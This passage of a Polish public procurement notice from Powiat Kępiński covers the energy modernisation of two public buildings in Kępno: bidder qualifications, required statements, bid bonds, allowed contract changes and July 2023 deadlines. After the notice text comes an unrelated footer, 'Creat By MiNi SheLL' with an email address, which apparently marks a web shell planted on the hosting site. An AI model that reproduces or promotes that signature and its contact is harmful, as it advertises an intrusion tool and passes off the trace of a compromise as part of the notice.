elektrycznych i elektroenergetycznych.<br/>W przypadku składania oferty na Część (Zadanie)Nr 7 zamówienia<br/>kierownik robót sanitarnych – wymagania z uprawnieniami budowlanymi do kierowania robotami w specjalności instalacyj-nej w zakresie sieci instalacji i urządzeń: cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń posiadający, co najmniej 2 lata doświadczenia w kierowaniu robotami instalacyjnymi jako kierownik budowy/ kierownik robót sanitarnych,.<br/>W przypadku składania oferty na Część (Zadanie)Nr 8 zamówienia<br/>kierownik budowy z uprawnieniami budowlanymi bez ograniczeń w specjalności konstrukcyjno-budowlanej (lub odpowiadające równoważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów), posiadający co najmniej 2 letnie doświadczenie w kierowaniu robotami budowlanymi jako kierownik budowy/ kierownik robót budowlanych. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1) Oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt. 5 ustawy, o braku , w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów ( Dz. U. z 2020r. poz.1076), z innym wykonawcą, który złożył odrębną ofertę, ofertę czę-ściową lub wniosek o dopuszczenie do udziału w postępowaniu albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej – załącznik nr 6 do SWZ.<br/>2) Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt.4 ustawy, sporządzone nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">5. W celu potwierdzenia spełnienia warunków udziału w postępowaniu: Część/ Zadanie zamówienia – ilość 8 <br/>1) Wykaz robót budowlanych (potwierdzających spełnianie warunku) wykonanych nie wcześniej niż w okresie ostatnich pięciu lat przed upływem składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, sporządzonego wg wzoru stanowiącego Załącznik nr 4 do SIWZ, z załączeniem dowodów, określających, czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym, czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone. Dowodami, o których mowa powyżej są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty . <br/>2) Wykaz osób skierowanych przez wykonawcę do realizacji zamówienia publicznego w szczególności odpowiedzialnych za świadczenia usług, kontrolę jakości lub kierowanie robotami budowlanymi wraz z informacjami na temat ich kwalifikacji zawodowych, uprawień, doświadczenia i wyksztalcenia niezbędnego do wykonania zamówienia publicznego, a także zakresu wykonywanych prze nie czynności oraz informacja podstawie dysponowania tymi osobami - Załącznik Nr 5 SWZ</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Do oferty( dotyczy zarówno oferty na Część/Zadanie Nr 1 /Część/Zadanie Nr 2/Część/Zadanie Nr 3/Część/Zadanie Nr 4 /Część/Zadanie Nr 5/Część//Zadanie Nr 6/ Część/Zadanie Nr 7/ Część/Zadanie Nr 8 zamówienia ), <br/>Wykonawca zobowiązany jest dołączyć aktualne na dzień składania ofert oświadczenia o spełnieniu warunków udziału w postępowaniu oraz braku podstaw do wykluczenia z postępowania – zgodnie z Załącznikiem Nr 2 i Nr 3 SWZ<br/>2. Informacje zawarte w oświadczeniach, których mowa w pkt. 1 stanowią wstępne potwierdzenie, ze Wykonawca, nie podlega wykluczeniu oraz spełniają warunki udziału w postępowaniu i tymczasowo zastępuje wymagane podmiotowe środki dowodowe.<br/>Wykonawca zobowiązany jest do realizowania obowiązku wynikającego z art. 68 ust. 3 ustawy z dnia 11 stycznia 2018 o elektromobilności i paliwach alternatywnych (Dz. U. z 2022 r. poz. 1083 ze zm.) zgodnie z którym udział pojazdów elektrycznych lub pojazdów napędzanych gazem ziemnym we flocie pojazdów użytkowych przy wykonywaniu zadania, stanowiącego przedmiot zamówienia wynosi co najmniej 10 %.<br/>Będzie weryfikowany poprzez wypełnienie przez Wykonawców oświadczenia dotyczącego pojazdów elektrycznych lub napędzanych gazem ziemnym i załączenie go do dokumentów ofertowych. Wzór formularza oświadczenia stanowi załącznik Nr 8 do SWZ <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Zamawiający żąda wniesienia wadium w kwocie:<br/>W przypadku składania oferty na Część /Zadanie Nr1 zamówienia: 20.000,00 (słownie złotych: dwadzieścia tysięcy 00/100) );<br/>W przypadku składania oferty na Część/Zadanie Nr 3 zamówienia: 10.000,00 (słownie złotych: dziesięć tysięcy00/100) );<br/>W przypadku składania oferty na więcej niż na jedną cześć/zadanie wykonawca wnosi wadium stanowiące równowartość sumy wadiów na dane części <br/>2. Wadium wnosi się przed upływem terminu składania ofert.<br/>3.Wadium może być wnoszone w jednej lub kilku następujących formach:<br/>1)	pieniądzu; <br/>2)	gwarancjach bankowych;<br/>3)	gwarancjach ubezpieczeniowych;<br/>4)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2020 r. poz. 299).<br/>4. Wadium w formie pieniądza należy wnieść przelewem na konto w Banku PKO BP S.A.O/ Kępno nr rachunku 24 1020 2212 0000 5702 0372 5900. z dopiskiem „Wadium na Kompleksowa modernizacja energetyczna dwóch budynków użyteczności publicznej stanowiących własność Powiatu Kępińskiego (budynek Powiatowego Centrum Pomocy Rodzinie w Kępnie i bu-dynek główny Zespołu Szkół Ponadpodstawowych Nr 2 w Kępnie część/ zadanie Nr. …..)<br/>UWAGA: Za termin wniesienia wadium w formie pieniężnej zostanie przyjęty termin uznania rachunku Zamawiającego.<br/>5. Wadium wnoszone w formie poręczeń lub gwarancji musi być złożone jako oryginał gwarancji lub poręczenia w postaci elektronicznej i spełniać co najmniej poniższe wymagania:<br/>1)	musi obejmować odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez Wykonawcę określone w ustawie p.z.p. <br/>2)	z jej treści powinno jednoznacznej wynikać zobowiązanie gwaranta do zapłaty całej kwoty wadium;<br/>3)	powinno być nieodwołalne i bezwarunkowe oraz płatne na pierwsze żądanie;<br/>4)	termin obowiązywania poręczenia lub gwarancji nie może być krótszy niż termin związania ofertą (z zastrzeżeniem iż pierwszym dniem związania ofertą jest dzień składania ofert); <br/>5)	w treści poręczenia lub gwarancji powinna znaleźć się nazwa oraz numer przedmiotowego postępowania oraz Część zamówienia……….<br/>6)	beneficjentem poręczenia lub gwarancji jest: Powiat Kępiński, ul. Kościuszki 5, 63-600 Kępno . <br/>7)	w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (art. 58 p.z.p.), Zamawiający wymaga aby poręczenie lub gwarancja obejmowała swą treścią (tj. zobowiązanych z tytułu poręczenia lub gwarancji) wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia lub aby z jej treści wynikało, że zabezpiecza ofertę Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum);<br/>6. Oferta wykonawcy, który nie wniesie wadium, wniesie wadium w sposób nieprawidłowy lub nie utrzyma wadium nieprzerwanie do upływu terminu związania ofertą lub złoży wniosek o zwrot wadium w przypadku, o którym mowa w art. 98 ust. 2 pkt 3 p.z.p. zostanie odrzucona.<br/>7. Zasady zwrotu oraz okoliczności zatrzymania wadium określa art. 98 p.z.p. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie niniejszego zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty. <br/>2. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, Oświadczenia o których mowa w pkt. X SWZ składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnienie warunków udziału w zakresie, w jakim każdy z wykonawców wykazuje spełnienie warunków udziału w postępowaniu.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączą do oferty oświadczenie, z którego wynika, które roboty budowlane wykonują poszczególni wykonawcy.<br/>4. Oświadczenia i dokumenty potwierdzające brak postaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 2. Dopuszczalne są zmiany zawartej umowy: <br/>1) Zmiana terminu realizacji przedmiotu umowy:<br/>a) wystąpienie niekorzystnych warunków atmosferycznych uniemożliwiających dochowanie wymogów technicznych i technologicznych a mianowicie: wystąpienia opadów deszczu nawalnego, potwierdzonego pisemnie przez inspektora nadzoru, powodującego całkowite zalanie wykopów lub robót ziemnych, niskie temperatury poniżej minus 5 stopni w ciągu doby powodujące wstrzymanie lub przerwanie prowadzenia prac, opady śniegu powyżej 15 cm grubości pokrywy, a także skażeń uniemożliwiających kontynuowanie umowy na przewidzianych w niej warunkach, w okresie dłuższym niż 5 następujących po sobie dni kalendarzowych, przy czym przedłużenie terminu realizacji zamówienia nastąpi o tyle dni, przez ile występowały opisane warunki atmosferyczne powodujące ich wstrzymanie z tym, że każda okoliczność wymaga pisemnego potwierdzenia przez inspektora nadzoru (nie uważa się za czynnik zakłócający wpływ czynników atmosferycznych w okresie realizacji robót, które Wykonawca winien wziąć pod uwagę przy składaniu oferty –cykl pór roku).<br/>b) wystąpienie okoliczności siły wyższej – jako siłę wyższą należy rozumieć nadzwyczajne wydarzenia i okoliczności, nieprzewidywalne, niezależne od dobrej woli i intencji którejkolwiek ze stron umowy, zewnętrzne, niemożliwe do zapobieżenia, które nastąpiły po dniu wejścia w życie umowy, w szczególności: wojny, akty terroryzmu, klęski żywiołowe, epidemie, strajki oraz akty władzy i administracji publicznej,<br/>c) wystąpienie wykopalisk archeologicznych uniemożliwiających powadzenie robót budowlanych, przeprowadzenie prób i sprawdzeń, dokonywanie odbiorów,( jeżeli dotyczy)<br/>d) zmiana będąca następstwem działania organów administracji, w szczególności przekroczenie określonych przez prawo terminów wydawania przez te organy decyzji, zezwoleń, itp.<br/>e) żądanie wstrzymania robót skierowane do Wykonawcy przez Zamawiającego, inspektora nadzoru inwestorskiego lub wydania zakazu prowadzenia prac przez organ administracji publicznej o ile żądanie lub wydanie zakazów nie nastąpiło z przyczyn, za które Wykonawca ponosi odpowiedzialność<br/>f) udzielenie w trakcie realizacji umowy zamówień dodatkowych, związanych z realizacją zamówienia podstawowego, mających wpływ na uzgodniony termin zakończenia realizacji przedmiotu umowy( powodujących konieczność jego wydłużenia),<br/>2)Zmiana sposobu i zakresu wykonywania robót:<br/>a) wystąpienie odmiennych od przyjętych w dokumentacji projektowej warunków terenowych, w szczególności istnienie nie zinwentaryzowanych lub błędnie zinwentaryzowanych obiektów budowlanych;<br/>b) wykonanie rozwiązań zamiennych w stosunku do projektowanych w dokumentacji projektowej np: wykonanie robót zamiennych, konieczność zastosowania innych rozwiązań materiałowych lub technicznych, niewykraczających poza zakres przedmiotu zamówienia jeżeli będzie to niezbędne dla prawidłowej realizacji przedmiotu umowy i uzyskania założonego efektu rzeczowego,<br/>c) zmiana podyktowana koniecznością wykonania robót wynikających z zaleceń organów uprawnionych np. nadzoru budowlanego,<br/>3) Zmiany osobowe:<br/>a) zmiana osób, przy pomocy których Wykonawca realizuje przedmiot umowy, wymienionych w § 4 ust. 3 umowy, na inne osoby posiadające co najmniej równoważne kwalifikacje, które wymagane były przez Zamawiającego w ogłoszeniu i specyfikacji warunków zamówienia.<br/>b) zmiana osób na stanowisku inspektora nadzoru wymienionych w § 4 ust. 3 umowy, pozostałe informacje zawarte w SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-07-07 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/powiatkepno</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-07-07 11:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 5. Szczegółowy opis oraz sposób realizacji zamówienia został określony został w załącznikach do SWZ: <br/>1) Harmonogram realizacji poszczególnych zadań (załącznik Nr 1a do SWZ) <br/>2) Projekty budowlane (załącznik nr 10 do SWZ), <br/>3) Specyfikacja techniczna wykonania i odbioru robót (załącznik nr 11 do SWZ) <br/>4) Przedmiary robót, będące załącznikiem do siwz stanowią element pomocniczy do wyceny oferty (załącznik nr 12 do SWZ), <br/>Wzór umowy stanowiący (załącznik Nr 9 do SWZ)<br/>6. Przedmiot zamówienia obejmuje również: <br/>a) zawiadomienie o zakończeniu robot,( zgłoszenia gotowości do odbioru końcowego)<br/>Realizacja robót budowlanych prowadzona będzie w czynnym obiekcie. Do obowiązku wykonawcy należeć będzie także zaplanowanie realizacji robót budowlanych aby w jak najmniejszym stopniu zakłóciło to działanie szkoły . Główne prace należy wykonywać w terminie od 15 czerwca do końca sierpnia. <br/>7. Przedmiot zamówienia obejmuje również: <br/>a) dokonanie odbiorów branżowych; ( jeżeli jest wymagane odrębnymi przepisami) <br/>b) w przypadku wprowadzenia przez Wykonawcę podczas realizacji istotnych zmian w stosunku do których wymagane będzie opracowania dokumentacji zamiennej. Wykonawca ma obowiązek wykonania projektu zamiennego lub jego zlecenia do biura projektowego. Koszt za wykonacie projektu zamiennego ponosi wykonawca.<br/>8. Do obowiązków wykonawcy należy także: <br/>powołać kierowników budowy z uprawnieniami branżowymi <br/>9. Wykonawca jest zobowiązany do przygotowania i dostarczenia Zamawiającemu przed podpisaniem umowy kosztorysu ofertowego na poszczególne części/zadania, sporządzonego w oparciu o przedmiar robót stanowiący Załącznik Nr11 do SWZ. Załączony do SWZ przedmiar robót ma charakter pomocniczy, przy opracowaniu kosztorysu ofertowego obejmującego przedmiot zamówienia należy uwzględnić dane wymykające z analizy projektu technicznego, przedmiaru robót oraz wnioski wynikające z analizy lokalnej w terenie.<br/>10.Wykonawca zobowiązuje się do zawarcia na własny koszt, polisy kontraktowej potwierdzającej, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie realizacji niniejszego przedmiotu umowy na czas realizacji przedmiotu umowy, na kwotę nie mniejszą niż wartość kontraktu. <br/>11. Niezależnie od polisy kontraktowej Wykonawca jest zobowiązany zawrzeć na własny koszt, polisę od odpowiedzialności cywilnej – deliktową w związku z prowadzoną działalnością gospodarczą.<br/>12. Obowiązek zawarcia ubezpieczeń będzie uznany za spełniony, w przypadku gdy Wykonawca najpóźniej w dniu przekazania terenu budowy przekaże Zamawiającemu polisy o których mowa w ust. 9 i 10 wraz z potwierdzeniem opłacenia składki.<br/>13. Wykonawca przy odbiorze końcowym przedmiotu zamówienia zobowiązany jest do:<br/>- przedstawienia certyfikatów, deklaracji zgodności lub atestów jakościowych wbudowanych materiałów zgodnych ze specyfikacją techniczną wykonania i odbioru robót budowlanych. 1.Wykonawca może złożyć jedną ofertę na Część/ Zadnie nr 1/i / lub na Część/ Zadanie Nr 2/ i/lub na Część/ Zadanie 3/i/lub na Część/ Zadanie Nr 4 /i/ lub na Część/ Zadanie Nr 5/i / lub na Część/Zadanie Nr 6 /i/ lub Część/ Zadanie Nr 7/i/lub Część/Zadanie Nr 8 zamówienia. <br/>2. Treść oferty musi zgodna z wymaganiami zamawiającego określonymi w dokumentach zamówienia . <br/>3. Ofertę składa się na Formularzu Ofertowym – zgodnie z Załącznikiem nr 1 do SWZ. Wraz z ofertą Wykonawca jest zobo-wiązany złożyć:<br/>1)	oświadczenia, o których mowa w Rozdziale X ust. 1 SWZ;<br/>2)	zobowiązanie innego podmiotu, o którym mowa w Rozdziale XI ust. 3 SWZ (jeżeli dotyczy);<br/>3)	dowód wniesienia wadium( jeżeli wymaga wniesienia)<br/>4)	dokumenty, z których wynika prawo do podpisania oferty; odpowiednie pełnomocnictwa (jeżeli dotyczy)

Creat By MiNi SheLL
Email: jattceo@gmail.com